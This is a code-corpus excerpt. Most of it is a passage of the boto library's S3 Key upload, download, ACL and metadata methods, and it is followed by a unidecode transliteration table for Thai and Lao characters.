Content-Type # header and depend on the receiving server to set the content # type. This can be achieved by setting headers['Content-Type'] # to None when calling this method. if (len(content_type_headers) == 1 and headers[content_type_headers[0]] is None): # Delete null Content-Type value to skip sending that header. del headers[content_type_headers[0]] else: self.content_type = merge_headers_by_name( 'Content-Type', headers) elif self.path: self.content_type = mimetypes.guess_type(self.path)[0] if self.content_type is None: self.content_type = self.DefaultContentType headers['Content-Type'] = self.content_type else: headers['Content-Type'] = self.content_type if self.base64md5: headers['Content-MD5'] = self.base64md5 if chunked_transfer: headers['Transfer-Encoding'] = 'chunked' #if not self.base64md5: # headers['Trailer'] = "Content-MD5" else: headers['Content-Length'] = str(self.size) # This is terrible. We need a SHA256 of the body for SigV4, but to do # the chunked ``sender`` behavior above, the ``fp`` isn't available to # the auth mechanism (because closures). Detect if it's SigV4 & embelish # while we can before the auth calculations occur. if 'hmac-v4-s3' in self.bucket.connection._required_auth_capability(): kwargs = {'fp': fp, 'hash_algorithm': hashlib.sha256} if size is not None: kwargs['size'] = size headers['_sha256'] = compute_hash(**kwargs)[0] headers['Expect'] = '100-Continue' headers = boto.utils.merge_meta(headers, self.metadata, provider) resp = self.bucket.connection.make_request( 'PUT', self.bucket.name, self.name, headers, sender=sender, query_args=query_args ) self.handle_version_headers(resp, force=True) self.handle_addl_headers(resp.getheaders()) def should_retry(self, response, chunked_transfer=False): provider = self.bucket.connection.provider if not chunked_transfer: if response.status in [500, 503]: # 500 & 503 can be plain retries. return True if response.getheader('location'): # If there's a redirect, plain retry. return True if 200 <= response.status <= 299: self.etag = response.getheader('etag') md5 = self.md5 if isinstance(md5, bytes): md5 = md5.decode('utf-8') # If you use customer-provided encryption keys, the ETag value that # Amazon S3 returns in the response will not be the MD5 of the # object. server_side_encryption_customer_algorithm = response.getheader( 'x-amz-server-side-encryption-customer-algorithm', None) if server_side_encryption_customer_algorithm is None: if self.etag != '"%s"' % md5: raise provider.storage_data_error( 'ETag from S3 did not match computed MD5. ' '%s vs. %s' % (self.etag, self.md5)) return True if response.status == 400: # The 400 must be trapped so the retry handler can check to # see if it was a timeout. # If ``RequestTimeout`` is present, we'll retry. Otherwise, bomb # out. body = response.read() err = provider.storage_response_error( response.status, response.reason, body ) if err.error_code in ['RequestTimeout']: raise PleaseRetryException( "Saw %s, retrying" % err.error_code, response=response ) return False def compute_md5(self, fp, size=None): """ :type fp: file :param fp: File pointer to the file to MD5 hash. The file pointer will be reset to the same position before the method returns. :type size: int :param size: (optional) The Maximum number of bytes to read from the file pointer (fp). This is useful when uploading a file in multiple parts where the file is being split in place into different parts. Less bytes may be available. """ hex_digest, b64_digest, data_size = compute_md5(fp, size=size) # Returned values are MD5 hash, base64 encoded MD5 hash, and data size. # The internal implementation of compute_md5() needs to return the # data size but we don't want to return that value to the external # caller because it changes the class interface (i.e. it might # break some code) so we consume the third tuple value here and # return the remainder of the tuple to the caller, thereby preserving # the existing interface. self.size = data_size return (hex_digest, b64_digest) def set_contents_from_stream(self, fp, headers=None, replace=True, cb=None, num_cb=10, policy=None, reduced_redundancy=False, query_args=None, size=None): """ Store an object using the name of the Key object as the key in cloud and the contents of the data stream pointed to by 'fp' as the contents. The stream object is not seekable and total size is not known. This has the implication that we can't specify the Content-Size and Content-MD5 in the header. So for huge uploads, the delay in calculating MD5 is avoided but with a penalty of inability to verify the integrity of the uploaded data. :type fp: file :param fp: the file whose contents are to be uploaded :type headers: dict :param headers: additional HTTP headers to be sent with the PUT request. :type replace: bool :param replace: If this parameter is False, the method will first check to see if an object exists in the bucket with the same key. If it does, it won't overwrite it. The default value is True which will overwrite the object. :type cb: function :param cb: a callback function that will be called to report progress on the upload. The callback should accept two integer parameters, the first representing the number of bytes that have been successfully transmitted to GS and the second representing the total number of bytes that need to be transmitted. :type num_cb: int :param num_cb: (optional) If a callback is specified with the cb parameter, this parameter determines the granularity of the callback by defining the maximum number of times the callback will be called during the file transfer. :type policy: :class:`boto.gs.acl.CannedACLStrings` :param policy: A canned ACL policy that will be applied to the new key in GS. :type reduced_redundancy: bool :param reduced_redundancy: If True, this will set the storage class of the new Key to be REDUCED_REDUNDANCY. The Reduced Redundancy Storage (RRS) feature of S3, provides lower redundancy at lower storage cost. :type size: int :param size: (optional) The Maximum number of bytes to read from the file pointer (fp). This is useful when uploading a file in multiple parts where you are splitting the file up into different ranges to be uploaded. If not specified, the default behaviour is to read all bytes from the file pointer. Less bytes may be available. """ provider = self.bucket.connection.provider if not provider.supports_chunked_transfer(): raise BotoClientError('%s does not support chunked transfer' % provider.get_provider_name()) # Name of the Object should be specified explicitly for Streams. if not self.name or self.name == '': raise BotoClientError('Cannot determine the destination ' 'object name for the given stream') if headers is None: headers = {} if policy: headers[provider.acl_header] = policy if reduced_redundancy: self.storage_class = 'REDUCED_REDUNDANCY' if provider.storage_class_header: headers[provider.storage_class_header] = self.storage_class if self.bucket is not None: if not replace: if self.bucket.lookup(self.name): return self.send_file(fp, headers, cb, num_cb, query_args, chunked_transfer=True, size=size) def set_contents_from_file(self, fp, headers=None, replace=True, cb=None, num_cb=10, policy=None, md5=None, reduced_redundancy=False, query_args=None, encrypt_key=False, size=None, rewind=False): """ Store an object in S3 using the name of the Key object as the key in S3 and the contents of the file pointed to by 'fp' as the contents. The data is read from 'fp' from its current position until 'size' bytes have been read or EOF. :type fp: file :param fp: the file whose contents to upload :type headers: dict :param headers: Additional HTTP headers that will be sent with the PUT request. :type replace: bool :param replace: If this parameter is False, the method will first check to see if an object exists in the bucket with the same key. If it does, it won't overwrite it. The default value is True which will overwrite the object. :type cb: function :param cb: a callback function that will be called to report progress on the upload. The callback should accept two integer parameters, the first representing the number of bytes that have been successfully transmitted to S3 and the second representing the size of the to be transmitted object. :type num_cb: int :param num_cb: (optional) If a callback is specified with the cb parameter this parameter determines the granularity of the callback by defining the maximum number of times the callback will be called during the file transfer. :type policy: :class:`boto.s3.acl.CannedACLStrings` :param policy: A canned ACL policy that will be applied to the new key in S3. :type md5: A tuple containing the hexdigest version of the MD5 checksum of the file as the first element and the Base64-encoded version of the plain checksum as the second element. This is the same format returned by the compute_md5 method. :param md5: If you need to compute the MD5 for any reason prior to upload, it's silly to have to do it twice so this param, if present, will be used as the MD5 values of the file. Otherwise, the checksum will be computed. :type reduced_redundancy: bool :param reduced_redundancy: If True, this will set the storage class of the new Key to be REDUCED_REDUNDANCY. The Reduced Redundancy Storage (RRS) feature of S3, provides lower redundancy at lower storage cost. :type encrypt_key: bool :param encrypt_key: If True, the new copy of the object will be encrypted on the server-side by S3 and will be stored in an encrypted form while at rest in S3. :type size: int :param size: (optional) The Maximum number of bytes to read from the file pointer (fp). This is useful when uploading a file in multiple parts where you are splitting the file up into different ranges to be uploaded. If not specified, the default behaviour is to read all bytes from the file pointer. Less bytes may be available. :type rewind: bool :param rewind: (optional) If True, the file pointer (fp) will be rewound to the start before any bytes are read from it. The default behaviour is False which reads from the current position of the file pointer (fp). :rtype: int :return: The number of bytes written to the key. """ provider = self.bucket.connection.provider headers = headers or {} if policy: headers[provider.acl_header] = policy if encrypt_key: headers[provider.server_side_encryption_header] = 'AES256' if rewind: # caller requests reading from beginning of fp. fp.seek(0, os.SEEK_SET) else: # The following seek/tell/seek logic is intended # to detect applications using the older interface to # set_contents_from_file(), which automatically rewound the # file each time the Key was reused. This changed with commit # 14ee2d03f4665fe20d19a85286f78d39d924237e, to support uploads # split into multiple parts and uploaded in parallel, and at # the time of that commit this check was added because otherwise # older programs would get a success status and upload an empty # object. Unfortuantely, it's very inefficient for fp's implemented # by KeyFile (used, for example, by gsutil when copying between # providers). So, we skip the check for the KeyFile case. # TODO: At some point consider removing this seek/tell/seek # logic, after enough time has passed that it's unlikely any # programs remain that assume the older auto-rewind interface. if not isinstance(fp, KeyFile): spos = fp.tell() fp.seek(0, os.SEEK_END) if fp.tell() == spos: fp.seek(0, os.SEEK_SET) if fp.tell() != spos: # Raise an exception as this is likely a programming # error whereby there is data before the fp but nothing # after it. fp.seek(spos) raise AttributeError('fp is at EOF. Use rewind option ' 'or seek() to data start.') # seek back to the correct position. fp.seek(spos) if reduced_redundancy: self.storage_class = 'REDUCED_REDUNDANCY' if provider.storage_class_header: headers[provider.storage_class_header] = self.storage_class # TODO - What if provider doesn't support reduced reduncancy? # What if different providers provide different classes? if hasattr(fp, 'name'): self.path = fp.name if self.bucket is not None: if not md5 and provider.supports_chunked_transfer(): # defer md5 calculation to on the fly and # we don't know anything about size yet. chunked_transfer = True self.size = None else: chunked_transfer = False if isinstance(fp, KeyFile): # Avoid EOF seek for KeyFile case as it's very inefficient. key = fp.getkey() size = key.size - fp.tell() self.size = size # At present both GCS and S3 use MD5 for the etag for # non-multipart-uploaded objects. If the etag is 32 hex # chars use it as an MD5, to avoid having to read the file # twice while transferring. if (re.match('^"[a-fA-F0-9]{32}"$', key.etag)): etag = key.etag.strip('"') md5 = (etag, base64.b64encode(binascii.unhexlify(etag))) if not md5: # compute_md5() and also set self.size to actual # size of the bytes read computing the md5. md5 = self.compute_md5(fp, size) # adjust size if required size = self.size elif size: self.size = size else: # If md5 is provided, still need to size so # calculate based on bytes to end of content spos = fp.tell() fp.seek(0, os.SEEK_END) self.size = fp.tell() - spos fp.seek(spos) size = self.size self.md5 = md5[0] self.base64md5 = md5[1] if self.name is None: self.name = self.md5 if not replace: if self.bucket.lookup(self.name): return self.send_file(fp, headers=headers, cb=cb, num_cb=num_cb, query_args=query_args, chunked_transfer=chunked_transfer, size=size) # return number of bytes written. return self.size def set_contents_from_filename(self, filename, headers=None, replace=True, cb=None, num_cb=10, policy=None, md5=None, reduced_redundancy=False, encrypt_key=False): """ Store an object in S3 using the name of the Key object as the key in S3 and the contents of the file named by 'filename'. See set_contents_from_file method for details about the parameters. :type filename: string :param filename: The name of the file that you want to put onto S3 :type headers: dict :param headers: Additional headers to pass along with the request to AWS. :type replace: bool :param replace: If True, replaces the contents of the file if it already exists. :type cb: function :param cb: a callback function that will be called to report progress on the upload. The callback should accept two integer parameters, the first representing the number of bytes that have been successfully transmitted to S3 and the second representing the size of the to be transmitted object. :type cb: int :param num_cb: (optional) If a callback is specified with the cb parameter this parameter determines the granularity of the callback by defining the maximum number of times the callback will be called during the file transfer. :type policy: :class:`boto.s3.acl.CannedACLStrings` :param policy: A canned ACL policy that will be applied to the new key in S3. :type md5: A tuple containing the hexdigest version of the MD5 checksum of the file as the first element and the Base64-encoded version of the plain checksum as the second element. This is the same format returned by the compute_md5 method. :param md5: If you need to compute the MD5 for any reason prior to upload, it's silly to have to do it twice so this param, if present, will be used as the MD5 values of the file. Otherwise, the checksum will be computed. :type reduced_redundancy: bool :param reduced_redundancy: If True, this will set the storage class of the new Key to be REDUCED_REDUNDANCY. The Reduced Redundancy Storage (RRS) feature of S3, provides lower redundancy at lower storage cost. :type encrypt_key: bool :param encrypt_key: If True, the new copy of the object will be encrypted on the server-side by S3 and will be stored in an encrypted form while at rest in S3. :rtype: int :return: The number of bytes written to the key. """ with open(filename, 'rb') as fp: return self.set_contents_from_file(fp, headers, replace, cb, num_cb, policy, md5, reduced_redundancy, encrypt_key=encrypt_key) def set_contents_from_string(self, string_data, headers=None, replace=True, cb=None, num_cb=10, policy=None, md5=None, reduced_redundancy=False, encrypt_key=False): """ Store an object in S3 using the name of the Key object as the key in S3 and the string 's' as the contents. See set_contents_from_file method for details about the parameters. :type headers: dict :param headers: Additional headers to pass along with the request to AWS. :type replace: bool :param replace: If True, replaces the contents of the file if it already exists. :type cb: function :param cb: a callback function that will be called to report progress on the upload. The callback should accept two integer parameters, the first representing the number of bytes that have been successfully transmitted to S3 and the second representing the size of the to be transmitted object. :type cb: int :param num_cb: (optional) If a callback is specified with the cb parameter this parameter determines the granularity of the callback by defining the maximum number of times the callback will be called during the file transfer. :type policy: :class:`boto.s3.acl.CannedACLStrings` :param policy: A canned ACL policy that will be applied to the new key in S3. :type md5: A tuple containing the hexdigest version of the MD5 checksum of the file as the first element and the Base64-encoded version of the plain checksum as the second element. This is the same format returned by the compute_md5 method. :param md5: If you need to compute the MD5 for any reason prior to upload, it's silly to have to do it twice so this param, if present, will be used as the MD5 values of the file. Otherwise, the checksum will be computed. :type reduced_redundancy: bool :param reduced_redundancy: If True, this will set the storage class of the new Key to be REDUCED_REDUNDANCY. The Reduced Redundancy Storage (RRS) feature of S3, provides lower redundancy at lower storage cost. :type encrypt_key: bool :param encrypt_key: If True, the new copy of the object will be encrypted on the server-side by S3 and will be stored in an encrypted form while at rest in S3. """ if not isinstance(string_data, bytes): string_data = string_data.encode("utf-8") fp = BytesIO(string_data) r = self.set_contents_from_file(fp, headers, replace, cb, num_cb, policy, md5, reduced_redundancy, encrypt_key=encrypt_key) fp.close() return r def get_file(self, fp, headers=None, cb=None, num_cb=10, torrent=False, version_id=None, override_num_retries=None, response_headers=None): """ Retrieves a file from an S3 Key :type fp: file :param fp: File pointer to put the data into :type headers: string :param: headers to send when retrieving the files :type cb: function :param cb: a callback function that will be called to report progress on the upload. The callback should accept two integer parameters, the first representing the number of bytes that have been successfully transmitted to S3 and the second representing the size of the to be transmitted object. :type cb: int :param num_cb: (optional) If a callback is specified with the cb parameter this parameter determines the granularity of the callback by defining the maximum number of times the callback will be called during the file transfer. :type torrent: bool :param torrent: Flag for whether to get a torrent for the file :type override_num_retries: int :param override_num_retries: If not None will override configured num_retries parameter for underlying GET. :type response_headers: dict :param response_headers: A dictionary containing HTTP headers/values that will override any headers associated with the stored object in the response. See http://goo.gl/EWOPb for details. :type version_id: str :param version_id: The ID of a particular version of the object. If this parameter is not supplied but the Key object has a ``version_id`` attribute, that value will be used when retrieving the object. You can set the Key object's ``version_id`` attribute to None to always grab the latest version from a version-enabled bucket. """ self._get_file_internal(fp, headers=headers, cb=cb, num_cb=num_cb, torrent=torrent, version_id=version_id, override_num_retries=override_num_retries, response_headers=response_headers, hash_algs=None, query_args=None) def _get_file_internal(self, fp, headers=None, cb=None, num_cb=10, torrent=False, version_id=None, override_num_retries=None, response_headers=None, hash_algs=None, query_args=None): if headers is None: headers = {} save_debug = self.bucket.connection.debug if self.bucket.connection.debug == 1: self.bucket.connection.debug = 0 query_args = query_args or [] if torrent: query_args.append('torrent') if hash_algs is None and not torrent: hash_algs = {'md5': md5} digesters = dict((alg, hash_algs[alg]()) for alg in hash_algs or {}) # If a version_id is passed in, use that. If not, check to see # if the Key object has an explicit version_id and, if so, use that. # Otherwise, don't pass a version_id query param. if version_id is None: version_id = self.version_id if version_id: query_args.append('versionId=%s' % version_id) if response_headers: for key in response_headers: query_args.append('%s=%s' % ( key, urllib.parse.quote(response_headers[key]))) query_args = '&'.join(query_args) self.open('r', headers, query_args=query_args, override_num_retries=override_num_retries) data_len = 0 if cb: if self.size is None: cb_size = 0 else: cb_size = self.size if self.size is None and num_cb != -1: # If size is not available due to chunked transfer for example, # we'll call the cb for every 1MB of data transferred. cb_count = (1024 * 1024) / self.BufferSize elif num_cb > 1: cb_count = int(math.ceil(cb_size/self.BufferSize/(num_cb-1.0))) elif num_cb < 0: cb_count = -1 else: cb_count = 0 i = 0 cb(data_len, cb_size) try: for bytes in self: fp.write(bytes) data_len += len(bytes) for alg in digesters: digesters[alg].update(bytes) if cb: if cb_size > 0 and data_len >= cb_size: break i += 1 if i == cb_count or cb_count == -1: cb(data_len, cb_size) i = 0 except IOError as e: if e.errno == errno.ENOSPC: raise StorageDataError('Out of space for destination file ' '%s' % fp.name) raise if cb and (cb_count <= 1 or i > 0) and data_len > 0: cb(data_len, cb_size) for alg in digesters: self.local_hashes[alg] = digesters[alg].digest() if self.size is None and not torrent and "Range" not in headers: self.size = data_len self.close() self.bucket.connection.debug = save_debug def get_torrent_file(self, fp, headers=None, cb=None, num_cb=10): """ Get a torrent file (see to get_file) :type fp: file :param fp: The file pointer of where to put the torrent :type headers: dict :param headers: Headers to be passed :type cb: function :param cb: a callback function that will be called to report progress on the upload. The callback should accept two integer parameters, the first representing the number of bytes that have been successfully transmitted to S3 and the second representing the size of the to be transmitted object. :type cb: int :param num_cb: (optional) If a callback is specified with the cb parameter this parameter determines the granularity of the callback by defining the maximum number of times the callback will be called during the file transfer. """ return self.get_file(fp, headers, cb, num_cb, torrent=True) def get_contents_to_file(self, fp, headers=None, cb=None, num_cb=10, torrent=False, version_id=None, res_download_handler=None, response_headers=None): """ Retrieve an object from S3 using the name of the Key object as the key in S3. Write the contents of the object to the file pointed to by 'fp'. :type fp: File -like object :param fp: :type headers: dict :param headers: additional HTTP headers that will be sent with the GET request. :type cb: function :param cb: a callback function that will be called to report progress on the upload. The callback should accept two integer parameters, the first representing the number of bytes that have been successfully transmitted to S3 and the second representing the size of the to be transmitted object. :type cb: int :param num_cb: (optional) If a callback is specified with the cb parameter this parameter determines the granularity of the callback by defining the maximum number of times the callback will be called during the file transfer. :type torrent: bool :param torrent: If True, returns the contents of a torrent file as a string. :type res_upload_handler: ResumableDownloadHandler :param res_download_handler: If provided, this handler will perform the download. :type response_headers: dict :param response_headers: A dictionary containing HTTP headers/values that will override any headers associated with the stored object in the response. See http://goo.gl/EWOPb for details. :type version_id: str :param version_id: The ID of a particular version of the object. If this parameter is not supplied but the Key object has a ``version_id`` attribute, that value will be used when retrieving the object. You can set the Key object's ``version_id`` attribute to None to always grab the latest version from a version-enabled bucket. """ if self.bucket is not None: if res_download_handler: res_download_handler.get_file(self, fp, headers, cb, num_cb, torrent=torrent, version_id=version_id) else: self.get_file(fp, headers, cb, num_cb, torrent=torrent, version_id=version_id, response_headers=response_headers) def get_contents_to_filename(self, filename, headers=None, cb=None, num_cb=10, torrent=False, version_id=None, res_download_handler=None, response_headers=None): """ Retrieve an object from S3 using the name of the Key object as the key in S3. Store contents of the object to a file named by 'filename'. See get_contents_to_file method for details about the parameters. :type filename: string :param filename: The filename of where to put the file contents :type headers: dict :param headers: Any additional headers to send in the request :type cb: function :param cb: a callback function that will be called to report progress on the upload. The callback should accept two integer parameters, the first representing the number of bytes that have been successfully transmitted to S3 and the second representing the size of the to be transmitted object. :type num_cb: int :param num_cb: (optional) If a callback is specified with the cb parameter this parameter determines the granularity of the callback by defining the maximum number of times the callback will be called during the file transfer. :type torrent: bool :param torrent: If True, returns the contents of a torrent file as a string. :type res_upload_handler: ResumableDownloadHandler :param res_download_handler: If provided, this handler will perform the download. :type response_headers: dict :param response_headers: A dictionary containing HTTP headers/values that will override any headers associated with the stored object in the response. See http://goo.gl/EWOPb for details. :type version_id: str :param version_id: The ID of a particular version of the object. If this parameter is not supplied but the Key object has a ``version_id`` attribute, that value will be used when retrieving the object. You can set the Key object's ``version_id`` attribute to None to always grab the latest version from a version-enabled bucket. """ try: with open(filename, 'wb') as fp: self.get_contents_to_file(fp, headers, cb, num_cb, torrent=torrent, version_id=version_id, res_download_handler=res_download_handler, response_headers=response_headers) except Exception: os.remove(filename) raise # if last_modified date was sent from s3, try to set file's timestamp if self.last_modified is not None: try: modified_tuple = email.utils.parsedate_tz(self.last_modified) modified_stamp = int(email.utils.mktime_tz(modified_tuple)) os.utime(fp.name, (modified_stamp, modified_stamp)) except Exception: pass def get_contents_as_string(self, headers=None, cb=None, num_cb=10, torrent=False, version_id=None, response_headers=None, encoding=None): """ Retrieve an object from S3 using the name of the Key object as the key in S3. Return the contents of the object as a string. See get_contents_to_file method for details about the parameters. :type headers: dict :param headers: Any additional headers to send in the request :type cb: function :param cb: a callback function that will be called to report progress on the upload. The callback should accept two integer parameters, the first representing the number of bytes that have been successfully transmitted to S3 and the second representing the size of the to be transmitted object. :type cb: int :param num_cb: (optional) If a callback is specified with the cb parameter this parameter determines the granularity of the callback by defining the maximum number of times the callback will be called during the file transfer. :type torrent: bool :param torrent: If True, returns the contents of a torrent file as a string. :type response_headers: dict :param response_headers: A dictionary containing HTTP headers/values that will override any headers associated with the stored object in the response. See http://goo.gl/EWOPb for details. :type version_id: str :param version_id: The ID of a particular version of the object. If this parameter is not supplied but the Key object has a ``version_id`` attribute, that value will be used when retrieving the object. You can set the Key object's ``version_id`` attribute to None to always grab the latest version from a version-enabled bucket. :type encoding: str :param encoding: The text encoding to use, such as ``utf-8`` or ``iso-8859-1``. If set, then a string will be returned. Defaults to ``None`` and returns bytes. :rtype: bytes or str :returns: The contents of the file as bytes or a string """ fp = BytesIO() self.get_contents_to_file(fp, headers, cb, num_cb, torrent=torrent, version_id=version_id, response_headers=response_headers) value = fp.getvalue() if encoding is not None: value = value.decode(encoding) return value def add_email_grant(self, permission, email_address, headers=None): """ Convenience method that provides a quick way to add an email grant to a key. This method retrieves the current ACL, creates a new grant based on the parameters passed in, adds that grant to the ACL and then PUT's the new ACL back to S3. :type permission: string :param permission: The permission being granted. Should be one of: (READ, WRITE, READ_ACP, WRITE_ACP, FULL_CONTROL). :type email_address: string :param email_address: The email address associated with the AWS account your are granting the permission to. :type recursive: boolean :param recursive: A boolean value to controls whether the command will apply the grant to all keys within the bucket or not. The default value is False. By passing a True value, the call will iterate through all keys in the bucket and apply the same grant to each key. CAUTION: If you have a lot of keys, this could take a long time! """ policy = self.get_acl(headers=headers) policy.acl.add_email_grant(permission, email_address) self.set_acl(policy, headers=headers) def add_user_grant(self, permission, user_id, headers=None, display_name=None): """ Convenience method that provides a quick way to add a canonical user grant to a key. This method retrieves the current ACL, creates a new grant based on the parameters passed in, adds that grant to the ACL and then PUT's the new ACL back to S3. :type permission: string :param permission: The permission being granted. Should be one of: (READ, WRITE, READ_ACP, WRITE_ACP, FULL_CONTROL). :type user_id: string :param user_id: The canonical user id associated with the AWS account your are granting the permission to. :type display_name: string :param display_name: An option string containing the user's Display Name. Only required on Walrus. """ policy = self.get_acl(headers=headers) policy.acl.add_user_grant(permission, user_id, display_name=display_name) self.set_acl(policy, headers=headers) def _normalize_metadata(self, metadata): if type(metadata) == set: norm_metadata = set() for k in metadata: norm_metadata.add(k.lower()) else: norm_metadata = {} for k in metadata: norm_metadata[k.lower()] = metadata[k] return norm_metadata def _get_remote_metadata(self, headers=None): """ Extracts metadata from existing URI into a dict, so we can overwrite/delete from it to form the new set of metadata to apply to a key. """ metadata = {} for underscore_name in self._underscore_base_user_settable_fields: if hasattr(self, underscore_name): value = getattr(self, underscore_name) if value: # Generate HTTP field name corresponding to "_" named field. field_name = underscore_name.replace('_', '-') metadata[field_name.lower()] = value # self.metadata contains custom metadata, which are all user-settable. prefix = self.provider.metadata_prefix for underscore_name in self.metadata: field_name = underscore_name.replace('_', '-') metadata['%s%s' % (prefix, field_name.lower())] = ( self.metadata[underscore_name]) return metadata def set_remote_metadata(self, metadata_plus, metadata_minus, preserve_acl, headers=None): metadata_plus = self._normalize_metadata(metadata_plus) metadata_minus = self._normalize_metadata(metadata_minus) metadata = self._get_remote_metadata() metadata.update(metadata_plus) for h in metadata_minus: if h in metadata: del metadata[h] src_bucket = self.bucket # Boto prepends the meta prefix when adding headers, so strip prefix in # metadata before sending back in to copy_key() call. rewritten_metadata = {} for h in metadata: if (h.startswith('x-goog-meta-') or h.startswith('x-amz-meta-')): rewritten_h = (h.replace('x-goog-meta-', '') .replace('x-amz-meta-', '')) else: rewritten_h = h rewritten_metadata[rewritten_h] = metadata[h] metadata = rewritten_metadata src_bucket.copy_key(self.name, self.bucket.name, self.name, metadata=metadata, preserve_acl=preserve_acl, headers=headers) def restore(self, days, headers=None): """Restore an object from an archive. :type days: int :param days: The lifetime of the restored object (must be at least 1 day). If the object is already restored then this parameter can be used to readjust the lifetime of the restored object. In this case, the days param is with respect to the initial time of the request. If the object has not been restored, this param is with respect to the completion time of the request. """ response = self.bucket.connection.make_request( 'POST', self.bucket.name, self.name, data=self.RestoreBody % days, headers=headers, query_args='restore') if response.status not in (200, 202): provider = self.bucket.connection.provider raise provider.storage_response_error(response.status, response.reason, response.read())
mit
menardorama/ReadyNAS-Add-ons
headphones-1.0.0/files/etc/apps/headphones/lib/unidecode/x00e.py
252
4092
data = ( '[?]', # 0x00 'k', # 0x01 'kh', # 0x02 'kh', # 0x03 'kh', # 0x04 'kh', # 0x05 'kh', # 0x06 'ng', # 0x07 'cch', # 0x08 'ch', # 0x09 'ch', # 0x0a 'ch', # 0x0b 'ch', # 0x0c 'y', # 0x0d 'd', # 0x0e 't', # 0x0f 'th', # 0x10 'th', # 0x11 'th', # 0x12 'n', # 0x13 'd', # 0x14 't', # 0x15 'th', # 0x16 'th', # 0x17 'th', # 0x18 'n', # 0x19 'b', # 0x1a 'p', # 0x1b 'ph', # 0x1c 'f', # 0x1d 'ph', # 0x1e 'f', # 0x1f 'ph', # 0x20 'm', # 0x21 'y', # 0x22 'r', # 0x23 'R', # 0x24 'l', # 0x25 'L', # 0x26 'w', # 0x27 's', # 0x28 's', # 0x29 's', # 0x2a 'h', # 0x2b 'l', # 0x2c '`', # 0x2d 'h', # 0x2e '~', # 0x2f 'a', # 0x30 'a', # 0x31 'aa', # 0x32 'am', # 0x33 'i', # 0x34 'ii', # 0x35 'ue', # 0x36 'uue', # 0x37 'u', # 0x38 'uu', # 0x39 '\'', # 0x3a '[?]', # 0x3b '[?]', # 0x3c '[?]', # 0x3d '[?]', # 0x3e 'Bh.', # 0x3f 'e', # 0x40 'ae', # 0x41 'o', # 0x42 'ai', # 0x43 'ai', # 0x44 'ao', # 0x45 '+', # 0x46 '', # 0x47 '', # 0x48 '', # 0x49 '', # 0x4a '', # 0x4b '', # 0x4c 'M', # 0x4d '', # 0x4e ' * ', # 0x4f '0', # 0x50 '1', # 0x51 '2', # 0x52 '3', # 0x53 '4', # 0x54 '5', # 0x55 '6', # 0x56 '7', # 0x57 '8', # 0x58 '9', # 0x59 ' // ', # 0x5a ' /// ', # 0x5b '[?]', # 0x5c '[?]', # 0x5d '[?]', # 0x5e '[?]', # 0x5f '[?]', # 0x60 '[?]', # 0x61 '[?]', # 0x62 '[?]', # 0x63 '[?]', # 0x64 '[?]', # 0x65 '[?]', # 0x66 '[?]', # 0x67 '[?]', # 0x68 '[?]', # 0x69 '[?]', # 0x6a '[?]', # 0x6b '[?]', # 0x6c '[?]', # 0x6d '[?]', # 0x6e '[?]', # 0x6f '[?]', # 0x70 '[?]', # 0x71 '[?]', # 0x72 '[?]', # 0x73 '[?]', # 0x74 '[?]', # 0x75 '[?]', # 0x76 '[?]', # 0x77 '[?]', # 0x78 '[?]', # 0x79 '[?]', # 0x7a '[?]', # 0x7b '[?]', # 0x7c '[?]', # 0x7d '[?]', # 0x7e '[?]', # 0x7f '[?]', # 0x80 'k', # 0x81 'kh', # 0x82 '[?]', # 0x83 'kh', # 0x84 '[?]', # 0x85 '[?]', # 0x86 'ng', # 0x87 'ch', # 0x88 '[?]', # 0x89 's', # 0x8a '[?]', # 0x8b '[?]', # 0x8c 'ny', # 0x8d '[?]', # 0x8e '[?]', # 0x8f '[?]', # 0x90 '[?]', # 0x91 '[?]', # 0x92 '[?]', # 0x93 'd', # 0x94 'h', # 0x95 'th', # 0x96 'th', # 0x97 '[?]', # 0x98 'n', # 0x99 'b', # 0x9a 'p', # 0x9b 'ph', # 0x9c 'f', # 0x9d 'ph', # 0x9e 'f', # 0x9f '[?]', # 0xa0 'm', # 0xa1 'y', # 0xa2 'r', # 0xa3 '[?]', # 0xa4 'l', # 0xa5 '[?]', # 0xa6 'w', # 0xa7 '[?]', # 0xa8 '[?]', # 0xa9 's', # 0xaa 'h', # 0xab '[?]', # 0xac '`', # 0xad '', # 0xae '~', # 0xaf 'a', # 0xb0 '', # 0xb1 'aa', # 0xb2 'am', # 0xb3 'i', # 0xb4 'ii', # 0xb5 'y', # 0xb6 'yy', # 0xb7 'u', # 0xb8 'uu', # 0xb9 '[?]', # 0xba 'o', # 0xbb 'l', # 0xbc 'ny', # 0xbd '[?]', # 0xbe '[?]', # 0xbf 'e', # 0xc0 'ei', # 0xc1 'o', # 0xc2 'ay', # 0xc3 'ai', # 0xc4 '[?]', # 0xc5 '+', # 0xc6 '[?]', # 0xc7 '', # 0xc8 '', # 0xc9 '', # 0xca '', # 0xcb '', # 0xcc 'M', # 0xcd '[?]', # 0xce '[?]', # 0xcf '0', # 0xd0 '1', # 0xd1 '2', # 0xd2 '3', # 0xd3 '4', # 0xd4 '5', # 0xd5 '6', # 0xd6 '7', # 0xd7 '8', # 0xd8 '9', # 0xd9 '[?]', # 0xda '[?]', # 0xdb 'hn', # 0xdc 'hm', # 0xdd '[?]', # 0xde '[?]', # 0xdf '[?]', # 0xe0 '[?]', # 0xe1 '[?]', # 0xe2 '[?]', # 0xe3 '[?]', # 0xe4 '[?]', # 0xe5 '[?]', # 0xe6 '[?]', # 0xe7 '[?]', # 0xe8 '[?]', # 0xe9 '[?]', # 0xea '[?]', # 0xeb '[?]', # 0xec '[?]', # 0xed '[?]', # 0xee '[?]', # 0xef '[?]', # 0xf0 '[?]', # 0xf1 '[?]', # 0xf2 '[?]', # 0xf3 '[?]', # 0xf4 '[?]', # 0xf5 '[?]', # 0xf6 '[?]', # 0xf7 '[?]', # 0xf8 '[?]', # 0xf9 '[?]', # 0xfa '[?]', # 0xfb '[?]', # 0xfc '[?]', # 0xfd '[?]', # 0xfe )
gpl-2.0
pubnub/Zopkio
examples/zookeeper/test_suites/zookeeper_test_faulttolerance.py
4
1959
